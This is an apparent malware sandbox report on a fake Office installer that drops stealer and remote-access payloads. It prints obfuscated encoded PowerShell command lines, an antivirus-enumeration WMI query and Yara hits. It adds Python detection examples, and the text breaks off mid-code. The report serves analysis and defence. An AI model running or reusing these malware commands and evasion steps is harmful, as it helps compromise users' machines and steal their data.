Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajageadgb6acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagiadabkacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagoacqbxacmapgagac0argbvahiaywblacaapaajahoacwbqacmapga="
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajageadgb6acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagiadabkacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagoacqbxacmapgagac0argbvahiaywblacaapaajahoacwbqacmapga="
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\^q
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp Binary or memory string: Office install DVDabeW9-KDdabcdefg50cfadf4-6ad2-4bd2-9981-c7b5c05a8c67CW9b4e8K4-JK298-aTYR-CR4K7D-RJRePath7XX-KQBKV-4XQT-2NfCreate ISO: ace59gFlag Library not initialisedBK-26Shell_TrayWndiaria2sl-sisl-SIH4H-JH9380ed cdnbaseurl.16=http://officecdn.microsoft.com/pr/Office 2013 StandardVL KMS ClientBelizeOffScrubC2R.vbs ALL /NoCancel /OSE 2>&1 b= storeid= forceupgrade=True piniconstotaskbar=False FV7-KQX|VisioProRetail.16YRFb98-9Basque/t /f /IM IntegratedOffice.exe-nop -c "$Tls12 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072); [System.Net.ServicePointManager]::SecurityProtocol = $Tls12; (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData','proxy44174279bJ48RF-QFNorwegian-d68a-4Not joined to any domain or groupadd "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\OSM\preventedapplications" /v "visiosolution" /t REG_DWORD /d 1 /fWhen downloading the distribution, use one threadPC-RHGrooveVLHQW-9RHpOffice 2016-2024 C2R Licenses (s64Beta2_OneNoteVLMondoVolumexpiGJH-9CTY7WJ-YQM7-J9ac4StandardVLac6a45c5bfb-2d5CastilianProductReleaseId id=RGOffice\Data\branch.txtv1.142a74b.logfiles9ca-cd79-4add "HKCU\Software\Microsoft\Office\16.0\OSM" /v "EnableUpload" /t REG_DWORD /d 0 /f/i64MJVOffice 2019 Standard2019VL KMS Client AE-a53d-450cacscript.exe //NoLogoproductstoremove={GetModuleFileNameExWONENOTE.EXEWMR-QKG9HD-MQX|ProofingTools}Office 2019 Outlook2019VL KMS Client AEcompilers\pbcompiler.exe" P3-B64c7-11cTXY-MG2Office 2010 Beta2 Standard KMS ClientBB0d862user32.dll\Office Installer+.ini/Office/Data/99-DXOffice 2010 Beta1 Mondo KMS 
ClientYBJOffice 2016 WordVL KMS Client23bcBDRTWindowsLicensed[0-9]{2}\.[0-9]{1}\.[0-9]{4,5}\.[0-9]{4,5}_[0-9]{4}-[0-9]{2}-[0-9]{2}_[0-9]{2}\.[0-9]{2}\.[0-9]{2}rubc24\Office Installer.exeBFMJ-B6abcefg6c255DeleteVolumeMountPointA308-8cb4-828WG-BK4627BDP-RDY9d3BJYHM-V68",openBMc85da06187YC7#32770Oriyad8cBeta2_StandardVLd873EnglishWindows Vista mediatype.16=Local sourcetype.16=Local version.16=\o16files\c2rpridslicensefiles_auto.xml1c8-8YFY-9WPYM3-7J2EstonianLicenses\Program Files\Microsoft Office\root\Office16\BTOneNoteVolumeCWGC6CWHGX-PHRXR-B8KC8b75-bSetLayeredWindowAttributesPortugueseSHEmptyRecycleBinAAMD64MK4-8B7Finland5b1c609e3Microsoft_LTSC2024 update channel
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\^q%
Source: AppLaunch.exe, 0000000A.00000002.2920632986.0000000006951000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.000000000697F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.0000000006959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Queries volume information: C:\Users\user\AppData\Local\Vulvvmkewji.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Users\user\AppData\Roaming\Lxfrfbi.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Users\user\AppData\Roaming\Lxfrfbi.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Code function: 4_2_00007FF6C7EE5890 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_00007FF6C7EE5890
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
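The SecurityCenter2 query above is the injected AppLaunch.exe payload enumerating registered antivirus products before it decides how to proceed. The Python below is an added example for this report, not Joe Sandbox or AsyncRAT code: it parses lines in the report's "WMI Queries" form and flags SecurityCenter2 product enumeration from any process outside an assumed allowlist of legitimate consumers. The allowlist and the benign sample lines are constructed for the example; the AppLaunch.exe line is the one from this report.

```python
"""Flag WMI antivirus enumeration (root\\SecurityCenter2) from unexpected processes.

Added example for this report, not Joe Sandbox or AsyncRAT code. Parses lines in
the report's 'Source: <process> WMI Queries: IWbemServices::ExecQuery - <ns> : <wql>'
form. The allowlist and the benign sample lines are constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

WMI_LINE = re.compile(
    r"^Source:\s+(?P<process>.+?)\s+WMI Queries:\s+IWbemServices::ExecQuery\s+-\s+"
    r"(?P<namespace>\S+)\s+:\s+(?P<wql>.+?)\s*$")
FROM_CLASS = re.compile(r"\bfrom\s+([A-Za-z0-9_]+)", re.IGNORECASE)

# Classes under root\SecurityCenter2 that tell malware which defenses are registered.
SECURITY_CLASSES = {"antivirusproduct", "antispywareproduct", "firewallproduct"}

# Assumed baseline of processes allowed to read SecurityCenter2 (tune per environment).
EXPECTED_CONSUMERS = {
    r"c:\windows\system32\wbem\wmic.exe",
    r"c:\windows\system32\securityhealthservice.exe",
}


@dataclass
class WmiEvent:
    process: str
    namespace: str
    wql: str

    @property
    def queried_class(self) -> Optional[str]:
        m = FROM_CLASS.search(self.wql)
        return m.group(1).lower() if m else None

    @property
    def is_av_enumeration(self) -> bool:
        return (self.namespace.lower() == r"root\securitycenter2"
                and self.queried_class in SECURITY_CLASSES)


def parse_wmi_line(line: str) -> Optional[WmiEvent]:
    """Return a WmiEvent for a report-style WMI query line, else None."""
    m = WMI_LINE.match(line.strip())
    if not m:
        return None
    return WmiEvent(m["process"], m["namespace"], m["wql"])


def find_suspicious(lines) -> List[WmiEvent]:
    """SecurityCenter2 product enumeration from a process that is not an expected consumer."""
    hits = []
    for line in lines:
        ev = parse_wmi_line(line)
        if ev is None or not ev.is_av_enumeration:
            continue
        if ev.process.lower() in EXPECTED_CONSUMERS:
            continue  # path match only; a production rule should also check signer/parent
        hits.append(ev)
    return hits


SAMPLE_LINES = [
    # the line from this report
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct",
    # constructed: same query from an expected consumer
    r"Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct",
    # constructed: unrelated query from the same host process
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor",
    # constructed: not a WMI line at all
    "Source: C:\\Windows\\System32\\svchost.exe Queries volume information: C:\\ VolumeInformation",
]

if __name__ == "__main__":
    for ev in find_suspicious(SAMPLE_LINES):
        print(f"ALERT {ev.process} -> {ev.namespace}: {ev.wql}")
```

Matching on the namespace and the class named in the WQL, rather than on the literal query string, keeps the rule robust to the `Select *` / `SELECT displayName` variants malware families use; the allowlist is a path-only baseline for the example, so in production it should be tightened with parent process and signature checks, since a hollowed AppLaunch.exe is itself a signed Microsoft binary on a trusted path.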

Stealing of Sensitive Information

Source: Yara match File source: 3.2.Vulvvmkewji.exe.4addde8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.6d69838.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4c9de48.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4b1de08.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4abddc8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4e9de68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.6d69838.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4e9de68.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4c9de48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7730000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7730000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1818612437.0000000006501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2011791495.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1729748988.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 3.2.Vulvvmkewji.exe.4addde8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.6d69838.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4c9de48.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4b1de08.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4abddc8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4e9de68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.6d69838.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4e9de68.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.4c9de48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7730000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.7730000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1818612437.0000000006501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2011791495.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1729748988.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
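The identifiers in the Yara match lists above encode which analysis process and which memory region each rule hit came from, and the same dumps appear under both the stealer and the remote-access headings. As an added example (not Joe Sandbox tooling), the Python below parses the `.unpack`, `.sdmp` and "Process Memory Space" forms as they appear on this page, joins them on the analysis process index, and reports regions whose protection field indicates writable executable memory. The field layout is inferred from the identifiers themselves; reading the fifth `.sdmp` field as a Win32 page-protection value is an assumption. The sample lines are copied from this section of the report.

```python
"""Correlate Joe Sandbox 'Yara match File source' identifiers per process.

Added example for this report (not Joe Sandbox code). Field layout is inferred
from the identifiers on this page; reading .sdmp field 5 as a Win32 page
protection is an assumption. Sample lines are copied from the report section.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

YARA_LINE = re.compile(
    r"^Source:\s+Yara match\s+File source:\s+(?P<src>.+?),\s+type:\s+(?P<kind>\w+)\s*$")
# <proc-index>.<stage>.<image>.<base-hex>.<n>[.raw].unpack
UNPACK_ID = re.compile(
    r"^(?P<idx>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-fA-F]+)\.(?P<n>\d+)\.(?P<raw>raw\.)?unpack$")
# <proc-index>.<stage>.<timestamp>.<base>.<protect>.<three more hex fields>.sdmp
SDMP_ID = re.compile(
    r"^(?P<idx>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.\d+\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<protect>[0-9A-Fa-f]{8})\.(?:[0-9A-Fa-f]{8}\.){3}sdmp$")
# Process Memory Space: <image> PID: <os-pid>
MEMSTR_ID = re.compile(r"^Process Memory Space:\s+(?P<image>\S+)\s+PID:\s+(?P<pid>\d+)$")

# Documented Win32 memory-protection constants; applying them to .sdmp field 5 is the assumption above.
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
WRITABLE_EXEC = PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY


@dataclass
class ProcessHits:
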